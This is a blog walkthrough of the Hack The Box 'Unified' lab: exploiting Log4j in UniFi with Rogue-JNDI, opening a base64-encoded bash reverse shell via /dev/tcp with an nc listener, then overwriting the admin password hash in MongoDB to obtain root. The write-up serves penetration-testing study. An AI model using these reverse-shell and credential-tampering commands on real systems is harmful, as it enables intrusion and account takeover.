The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

posted on 28.5.2023 by Below Surface in "Hack The Box"

Port scan first. Exchange ip with your machines IP address!

nmap -sC -sV -v ip

Relevant output:

Discovered open port 8080/tcp on
Discovered open port 22/tcp on
Discovered open port 8443/tcp on
Discovered open port 6789/tcp on

Opening the website with its IP address only does not work. You need to add the port :8443:


UniFi 6.4.54, which is running on this system, is vulnerable (Log4J). So we will try to exploit that. To do this, we will use a tool called FoxyProxy, make a POST request to /api/login and intercept the request with BurpSuite. Then we will edit the request and inject commands. Let's start up BurpSuite (I'm using Kali Linux):


In BurpSuite, we will enable intercepting by opening the tab Proxy/Intercept and making sure, the button says "Intercept is on". In Firefox, make sure that in Settings/Proxy, the "Manual proxy configuration" is enabled and the HTTP Proxy field is set to The Port should be set to 8080 and a check mark should be set for "Also use this proxy for HTTPS".

When refreshing the target website now, BurpSuite should catch the request.

We will try the credentials

Username: test
Password: test

And catch the request with BurpSuite. Press ctrl + r to send the request to the Repeater in BurpSuite. Now get your ip address:

ifconfig tun0 // select the inet one

Then this is the command to paste into the intercepted request. Instead of


It should be now (paste the tun0 inet ip for ip):


Then in BurpSuite, switch to the Repeater tab and click "Send".

Relevant response:


From this we learn that even if the payload is invalid, the payload is still being executed! Now we will use tcpdump to monitor traffic for LDAP (Lightweight Directory Access Protocol) connections. Open a new terminal:

sudo tcpdump -i tun0 port 389

Then navigate back to BurpSuite and hit "Send" again. We see that our machine receives an incoming connection via the LDAP port 389

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
13:14:52.657397 IP > Flags [S], seq 3360553977, win 64240, options [mss 1340,sackOK,TS val 359429455 ecr 0,nop,wscale 7], length 0
13:14:52.657415 IP > Flags [R.], seq 0, ack 3360553978, win 0, length 0

Now we will build a payload with Open-JDK and Maven. This payload will be sent to the server and give us remote code execution.

sudo apt install openjdk-11-jdk -y
sudo apt-get install maven

Now we will download and build a Java application called Rogue-JNDI.

git clone
cd rogue-jndi
mvn package

This will build us a file called Rogue.Jndi-1.1.jar inside the /rogue-jndi/target directory. It should say BUILD SUCCESS.

Then we can build the payload. Please exchange ip with your tun0 inet IP address.

echo 'bash -c bash -i >&/dev/tcp/ip/4444 0>&1' | base64

The output/payload is a base64 string which is displayed in the terminal. Now we will start Rogue-JNDI and pass our payload. Please paste your string in exchange for "base64string" and exchange ip with your tun0 inet address.

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,base64string}|{base64,-d}|{bash,-i}" --hostname "ip"

Time for a new terminal window with Ncat listening on port 4444.

nc -lvp 4444

Then, in BurpSuite, modify the request to (ip should be your tun0 inet address):


And click "Send". In the Ncat terminal we get: inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 50774

And in our RogueJndi terminal:

Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

So it worked! In the Ncat terminal run:

script /dev/null -c bash


Script started, file is /dev/null

Get the user flag:

cd /home/michael
cat user.txt

Time for privilege escalation. We will check if MongoDB is running on the server and if we can extract credentials from the database:

ps aux | grep mongo

Yes, MongoDB is running on port 27117! Let's try to find default data in it:

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

Relevant output:

"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
        "name" : "administrator",
        "email" : "administrator@unified.htb",
        "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",

We got the login name and password hash! Instead of cracking the available hash, we will exchange it with our own created password hash. In another terminal window, run

mkpasswd -m sha-512 mypassword

Will output something like:


Now we will replace the current hash for the administrator with our own.

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$6i8kY9DGnHfM/j0E$bTjTf.AgJHx2XqkCqobtJtMaHHx4lST6de4gvyLXaJgsfxpNjHg39DEAaOsCNwW6dydKdUrNdKmRbDOPKhKyd/"}})'

Relevant output:

WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })

On the website, we can now log in with:

Username: administrator
Password: mypassword

If the website is not responding, turn off intercepting in BurpSuite. Once the website loaded, click on Settings/Site and scroll down to DEVICE AUTHENTICATION. Here we can display the ssh root password in clear text by clicking on the eye symbol inside the Password field (NotACrackablePassword4U2022). So let's SSH into the machine as root Exchange ip with your machines IP address!

ssh root@ip
Password: NotACrackablePassword4U2022

Get the flag:

cat root.txt


hack the box
privilege escalation


More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box